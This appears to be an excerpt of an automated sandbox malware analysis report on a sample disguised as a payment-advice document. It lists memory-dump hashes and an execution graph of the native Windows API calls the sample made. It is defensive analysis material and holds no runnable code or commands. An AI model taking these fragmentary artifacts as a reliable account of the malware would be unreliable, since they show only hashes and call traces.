                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 60b5d7673a3f94f7ec8438b7461f9a126305b889a2d8a044669329304eda3c78
                                                                                                                                            • Instruction ID: 58198e05f45b02423e4e741e93e24200ed85eae5b77d90ac708d0f0ae354023c
                                                                                                                                            • Opcode Fuzzy Hash: 60b5d7673a3f94f7ec8438b7461f9a126305b889a2d8a044669329304eda3c78
                                                                                                                                            • Instruction Fuzzy Hash: DBD05E311907058FD700AB6CD945865B7B4EF45708B000995E205A7235FB21F9548645
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 644e7b06de1f46c1648dade0d333cfa1d81ecca285693a58211929e580c1a12a
                                                                                                                                            • Instruction ID: 2941b34ad0d04b998637868994e6d5069627934e8676133bd7135e15377e5625
                                                                                                                                            • Opcode Fuzzy Hash: 644e7b06de1f46c1648dade0d333cfa1d81ecca285693a58211929e580c1a12a
                                                                                                                                            • Instruction Fuzzy Hash: 78D0A983D24A054AE312367898430DC7B20F822220B409B62C4A0090F2FE1411AB43E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c874f2353ecef34ffd0b4618baac8cba30e707d715e16d4c371316902f7d5bfd
                                                                                                                                            • Instruction ID: a1d96bec7fd36f7ee878a695bb27cb8ca859127809bf56a4c4c8ce5f9ea9eb93
                                                                                                                                            • Opcode Fuzzy Hash: c874f2353ecef34ffd0b4618baac8cba30e707d715e16d4c371316902f7d5bfd
                                                                                                                                            • Instruction Fuzzy Hash: 51D05E6855D38B8FFF02F670A8A65843F70E90220C3068697E0008229BEA7895D38341
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e2293ef3963499396639e8ab763c1cdf3564514a780a82048d39e362bb5098a4
                                                                                                                                            • Instruction ID: 69322f60d19db6236df0b8b08d7326d9f479fc0e362eac333907f44aa46fcc0b
                                                                                                                                            • Opcode Fuzzy Hash: e2293ef3963499396639e8ab763c1cdf3564514a780a82048d39e362bb5098a4
                                                                                                                                            • Instruction Fuzzy Hash: B9D0A731150705CFC300FB6CD942868F7B4FF45704B000595E20597235FB20F8548645
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7e5cfff58d3e9d2e0bbfd4d4f6229de24ac1a487964aa45345ee69384e1ab550
                                                                                                                                            • Instruction ID: b23d5812a8f5b36201ea03dfb77a928fe7dcb4ef9a900fbcb2a27de5690550c5
                                                                                                                                            • Opcode Fuzzy Hash: 7e5cfff58d3e9d2e0bbfd4d4f6229de24ac1a487964aa45345ee69384e1ab550
                                                                                                                                            • Instruction Fuzzy Hash: A1D0123134013897C7151A65F5587EF775CFB41792F05402AF50686180CF7C9D50C7E6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1f30a2e8b1366d7dd5307eed59af84af1647410109b5629bccf27de0e2f56867
                                                                                                                                            • Instruction ID: ab276a541ede58085c5c2f129122f7afb3322f538911f4e934817e6c5243921b
                                                                                                                                            • Opcode Fuzzy Hash: 1f30a2e8b1366d7dd5307eed59af84af1647410109b5629bccf27de0e2f56867
                                                                                                                                            • Instruction Fuzzy Hash: 9CD0C9327401249F8A04AA58D400CAA7BAADB9D6653014066F905CB331CE61EC51C7E4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: de4af03aef7b0e51a85689eef1fbe866e91da186e42f67e8b72a26213656e6ab
                                                                                                                                            • Instruction ID: d451e000a3213bc93dea7102d6f9776d38a9eb65c9dbc566b8e36b889ccb4563
                                                                                                                                            • Opcode Fuzzy Hash: de4af03aef7b0e51a85689eef1fbe866e91da186e42f67e8b72a26213656e6ab
                                                                                                                                            • Instruction Fuzzy Hash: 22D0C9327400249F8B04AB58E4408AA7BAADB9D6653014066F909CB331CE61DD52C7D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 61f9675556fdffa5ef466244173db6151c92579e03e71c0fe0490e9eddcb25e0
                                                                                                                                            • Instruction ID: 242fca0dc28c37c633851f65949b144ee857b5d2acaa8c40fa72201f6dc5a304
                                                                                                                                            • Opcode Fuzzy Hash: 61f9675556fdffa5ef466244173db6151c92579e03e71c0fe0490e9eddcb25e0
                                                                                                                                            • Instruction Fuzzy Hash: 3AD0123134113497C7151A64F5983EF7B58FB41792F05402AF50A86180CF7C8D51C7D6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8aa4cfff33167981efc85d5e78babb6d2fd5ba939e3868e98c8185419a10dbe1
                                                                                                                                            • Instruction ID: 4cea7463ce4719a882b833ff1f25651d375fed594b5576124a4763cf73c44c1d
                                                                                                                                            • Opcode Fuzzy Hash: 8aa4cfff33167981efc85d5e78babb6d2fd5ba939e3868e98c8185419a10dbe1
                                                                                                                                            • Instruction Fuzzy Hash: 2AD01235140004AFCB41EF24D486CD97BA5EF05220B01C0A5FD598F722C335D9179B80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 148d027902b4a279bef4f3b9a879aa7802ecbf98369b505a4636c59328d3cf8f
                                                                                                                                            • Instruction ID: e54c415a24d176fcb7bb12d2d1009dbacdd96428d5a6b309bbc810fa74480717
                                                                                                                                            • Opcode Fuzzy Hash: 148d027902b4a279bef4f3b9a879aa7802ecbf98369b505a4636c59328d3cf8f
                                                                                                                                            • Instruction Fuzzy Hash: 17E01778A40109CFDB14CFA4D1A9AEDBFB0EF0C300F20841AE512EB261CB34A845CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2d33350db8856c60635cd65c54022f7f15df8a704e3aa1a9ebd3db7428718807
                                                                                                                                            • Instruction ID: ec3305f5161db1a0f9491019dcb384ae86a5a5431f4785112584dbbcaef4b19f
                                                                                                                                            • Opcode Fuzzy Hash: 2d33350db8856c60635cd65c54022f7f15df8a704e3aa1a9ebd3db7428718807
                                                                                                                                            • Instruction Fuzzy Hash: 10B09B2131513913D608319D64206BE728DC7C5569F400067960D877454DC5AD5202EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                            • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                                                            • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                            • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                                                            • API String ID: 0-3486158592
                                                                                                                                            • Opcode ID: a2461b1172f7fc799b1ee92055cba6144d4587d8811975046396dcac9cb370d4
                                                                                                                                            • Instruction ID: ae2c060aa7fe43ef8e5244f35063c98c8ec1c558e4ba01a8e95f2201ff96d88c
                                                                                                                                            • Opcode Fuzzy Hash: a2461b1172f7fc799b1ee92055cba6144d4587d8811975046396dcac9cb370d4
                                                                                                                                            • Instruction Fuzzy Hash: E4025975B005159FCB18CF69C998A6DBBB2BF88710B158269E81ADB3B4DB70FC11CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7c53b11ddd90c76a040df9fa5defd3f13a3cf2af1719e91af600443c27c10245
                                                                                                                                            • Instruction ID: 939d06d135cff9d2e0bdfef49bc4279d787c752b6cb2dab789d6587f46429c1d
                                                                                                                                            • Opcode Fuzzy Hash: 7c53b11ddd90c76a040df9fa5defd3f13a3cf2af1719e91af600443c27c10245
                                                                                                                                            • Instruction Fuzzy Hash: 3312A3FB401746BAD312CF25EA4C3893BB1FB45318B984209D2652A6E5DFBC1D4ACF84
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 78a1cde833bf941f0e9eb35ab3719d9338ea5a498e844ff0dc39d425f92b5b73
                                                                                                                                            • Instruction ID: 17103c45c69b71c1eb6c21613f6733a55d7edfbf213100448f9dc08b9441f2ae
                                                                                                                                            • Opcode Fuzzy Hash: 78a1cde833bf941f0e9eb35ab3719d9338ea5a498e844ff0dc39d425f92b5b73
                                                                                                                                            • Instruction Fuzzy Hash: C0E11731D1075A8ACB01EB64D990AA9F7B1FFD5300F50C79AE50937265FB70AAC9CB81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fc7378cdd22edc21bef6759819787ca9f05bf2200300a8abef1fe3999e60369e
                                                                                                                                            • Instruction ID: 5e61c120fd719342567dab61d19243199b82e23f2c26bac0b731dab41aee3dc3
                                                                                                                                            • Opcode Fuzzy Hash: fc7378cdd22edc21bef6759819787ca9f05bf2200300a8abef1fe3999e60369e
                                                                                                                                            • Instruction Fuzzy Hash: CBD1F831D2065A8ACB01EB64D990AADF7B1FFD5300F50C79AE50937264FB70AAC5CB41
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a9d42dfb67bae3b6ed61518de21afe5aa3f1f3b4a41000b1f5d093fd789de332
                                                                                                                                            • Instruction ID: 636cec0c62a43798538af997566767c9c23a0648bdd9984bf059a3fcb1bdf714
                                                                                                                                            • Opcode Fuzzy Hash: a9d42dfb67bae3b6ed61518de21afe5aa3f1f3b4a41000b1f5d093fd789de332
                                                                                                                                            • Instruction Fuzzy Hash: 43A15D36A002099FCF06DFB4D8445EEBBB2FF84300B15456AE905AB265DB35ED55CF80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6710a84fc0859f64f8c38501b58de1b5af0a4b7864a78fa8b4b13d5f72ac3016
                                                                                                                                            • Instruction ID: 5579e1bbd85bae7d2d2de86c7ecef2afd00474e1411a9009c3d3fc7ad277785f
                                                                                                                                            • Opcode Fuzzy Hash: 6710a84fc0859f64f8c38501b58de1b5af0a4b7864a78fa8b4b13d5f72ac3016
                                                                                                                                            • Instruction Fuzzy Hash: A7C1F7BB801746BAD712CF25EA4C3897BB1FB85318B584209D1616B6E4DFBC1D4ACF84

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                            Signature Coverage:8.2%
                                                                                                                                            Total number of Nodes:147
                                                                                                                                            Total number of Limit Nodes:14
                                                                                                                                            execution_graph 92256 4253c3 92261 4253dc 92256->92261 92257 425469 92258 425424 92264 42ee73 92258->92264 92261->92257 92261->92258 92262 425464 92261->92262 92263 42ee73 RtlFreeHeap 92262->92263 92263->92257 92267 42d113 92264->92267 92266 425434 92268 42d12d 92267->92268 92269 42d13e RtlFreeHeap 92268->92269 92269->92266 92271 42ff13 92272 42ff23 92271->92272 92273 42ff29 92271->92273 92276 42ef53 92273->92276 92275 42ff4f 92279 42d0c3 92276->92279 92278 42ef6e 92278->92275 92280 42d0dd 92279->92280 92281 42d0ee RtlAllocateHeap 92280->92281 92281->92278 92282 425033 92283 42504f 92282->92283 92284 425077 92283->92284 92285 42508b 92283->92285 92287 42cd93 NtClose 92284->92287 92292 42cd93 92285->92292 92289 425080 92287->92289 92288 425094 92295 42ef93 RtlAllocateHeap 92288->92295 92291 42509f 92293 42cdb0 92292->92293 92294 42cdc1 NtClose 92293->92294 92294->92288 92295->92291 92296 42c393 92297 42c3b0 92296->92297 92300 16e2df0 LdrInitializeThunk 92297->92300 92298 42c3d8 92300->92298 92301 414613 92307 4145e8 92301->92307 92302 4145f8 92303 41466d 92304 414690 92303->92304 92306 414684 PostThreadMessageW 92303->92306 92306->92304 92307->92302 92307->92303 92308 417dc3 92307->92308 92310 417de7 92308->92310 92309 417dee 92309->92307 92310->92309 92311 417e23 LdrLoadDll 92310->92311 92312 417e3a 92310->92312 92311->92312 92312->92307 92313 419433 92315 419463 92313->92315 92316 41948f 92315->92316 92317 41b903 92315->92317 92318 41b947 92317->92318 92319 41b968 92318->92319 92320 42cd93 NtClose 92318->92320 92319->92315 92320->92319 92321 41ab93 92322 41abab 92321->92322 92324 41ac05 92321->92324 92322->92324 92325 41eb03 92322->92325 92326 41eb29 92325->92326 92330 41ec20 92326->92330 92331 430043 92326->92331 92328 41ebbe 92328->92330 92337 42c3e3 92328->92337 92330->92324 92332 42ffb3 92331->92332 92333 430010 92332->92333 92334 42ef53 RtlAllocateHeap 92332->92334 92333->92328 92335 42ffed 92334->92335 92336 42ee73 RtlFreeHeap 92335->92336 92336->92333 92338 42c400 92337->92338 92341 16e2c0a 92338->92341 92339 42c42c 92339->92330 92342 16e2c1f LdrInitializeThunk 92341->92342 92343 16e2c11 92341->92343 92342->92339 92343->92339 92344 401b38 92345 401b43 92344->92345 92348 4303e3 92345->92348 92351 42ea23 92348->92351 92352 42ea49 92351->92352 92363 407533 92352->92363 92354 42ea5f 92355 401bfa 92354->92355 92366 41b713 92354->92366 92357 42ea7e 92358 42ea93 92357->92358 92381 42d163 92357->92381 92377 428923 92358->92377 92361 42eaad 92362 42d163 ExitProcess 92361->92362 92362->92355 92365 407540 92363->92365 92384 416a63 92363->92384 92365->92354 92367 41b73f 92366->92367 92395 41b603 92367->92395 92370 41b784 92372 41b7a0 92370->92372 92375 42cd93 NtClose 92370->92375 92371 41b76c 92373 41b777 92371->92373 92374 42cd93 NtClose 92371->92374 92372->92357 92373->92357 92374->92373 92376 41b796 92375->92376 92376->92357 92378 428985 92377->92378 92380 428992 92378->92380 92406 418c33 92378->92406 92380->92361 92382 42d17d 92381->92382 92383 42d18e ExitProcess 92382->92383 92383->92358 92385 416a80 92384->92385 92387 416a99 92385->92387 92388 42d813 92385->92388 92387->92365 92390 42d82d 92388->92390 92389 42d85c 92389->92387 92390->92389 92391 42c3e3 LdrInitializeThunk 92390->92391 92392 42d8bc 92391->92392 92393 42ee73 RtlFreeHeap 92392->92393 92394 42d8d5 92393->92394 92394->92387 92396 41b61d 92395->92396 92400 41b6f9 92395->92400 92401 42c483 92396->92401 92399 42cd93 NtClose 92399->92400 92400->92370 92400->92371 92402 42c49d 92401->92402 92405 16e35c0 LdrInitializeThunk 92402->92405 92403 41b6ed 92403->92399 92405->92403 92408 418c5d 92406->92408 92407 41916b 92407->92380 92408->92407 92414 414283 92408->92414 92410 418d8a 92410->92407 92411 42ee73 RtlFreeHeap 92410->92411 92412 418da2 92411->92412 92412->92407 92413 42d163 ExitProcess 92412->92413 92413->92407 92415 4142a3 92414->92415 92418 41430c 92415->92418 92419 41ba23 92415->92419 92418->92410 92420 41ba48 92419->92420 92426 42a0c3 92420->92426 92422 414302 92422->92410 92424 41ba79 92424->92422 92425 42ee73 RtlFreeHeap 92424->92425 92431 41b863 LdrInitializeThunk 92424->92431 92425->92424 92427 42a128 92426->92427 92428 42a15b 92427->92428 92432 4140e3 92427->92432 92428->92424 92430 42a13d 92430->92424 92431->92424 92433 414112 92432->92433 92434 4140a8 92432->92434 92437 42d023 92434->92437 92438 42d040 92437->92438 92441 16e2c70 LdrInitializeThunk 92438->92441 92439 4140c5 92439->92430 92441->92439 92270 16e2b60 LdrInitializeThunk

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 329 417dc3-417dec call 42fa53 332 417df2-417e00 call 430053 329->332 333 417dee-417df1 329->333 336 417e10-417e21 call 42e4f3 332->336 337 417e02-417e0d call 4302f3 332->337 342 417e23-417e37 LdrLoadDll 336->342 343 417e3a-417e3d 336->343 337->336 342->343
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                            • Instruction ID: 2f2cbff0a24190b22dfd2152e99f66e997f339ee9ba054a098c76015c184d67c
                                                                                                                                            • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                            • Instruction Fuzzy Hash: D70175B1E0020DA7DF10DBE5DC42FDEB7B8AB54308F0081A6E90897240F634EB548B95

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 354 42cd93-42cdcf call 404943 call 42e003 NtClose
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CDCA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                            • Instruction ID: b915159f885522db5443b9e3ff62b849829641cf8f4aa2f019e369742d55ea9e
                                                                                                                                            • Opcode Fuzzy Hash: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                            • Instruction Fuzzy Hash: 96E04F713002547BD220EA6ADC01FAB775CDBC5714F00445AFA18A7181D7B5B90186E4
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 2d7487109c74c7d409bbf29a5b51d51bf9691025c8234390718a436cfefaf403
                                                                                                                                            • Instruction ID: 7552dec0c512de9f06153d9243f9ad0577a7c7fc2dafa46684092af09f7d3b1c
                                                                                                                                            • Opcode Fuzzy Hash: 2d7487109c74c7d409bbf29a5b51d51bf9691025c8234390718a436cfefaf403
                                                                                                                                            • Instruction Fuzzy Hash: 4090026120240003450575584814617400ED7E1201B55C065E6014690EC625C9A56225
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 1ee44d460fbdd1a574592d2ffd1f3aef62eac59130603ae858e277c72ce0cee9
                                                                                                                                            • Instruction ID: e6c0a91f38d55bc7f564eaba0b34219da3785de6067d0022cef1693a5153ac57
                                                                                                                                            • Opcode Fuzzy Hash: 1ee44d460fbdd1a574592d2ffd1f3aef62eac59130603ae858e277c72ce0cee9
                                                                                                                                            • Instruction Fuzzy Hash: BA90023120140413D51175584904707000DD7D1241F95C456A5424658ED756CA66A221
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 7adb567d45069631eb968e96b4491fd14eecaf27451764c0e4b6bf76e9fa9c6e
                                                                                                                                            • Instruction ID: 29b158438bf65dc35d975f2f04bdc85b878c1bc8c7cda1018ba2e32d246f9450
                                                                                                                                            • Opcode Fuzzy Hash: 7adb567d45069631eb968e96b4491fd14eecaf27451764c0e4b6bf76e9fa9c6e
                                                                                                                                            • Instruction Fuzzy Hash: 2390023120148802D5107558880474B0009D7D1301F59C455A9424758EC795C9A57221
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
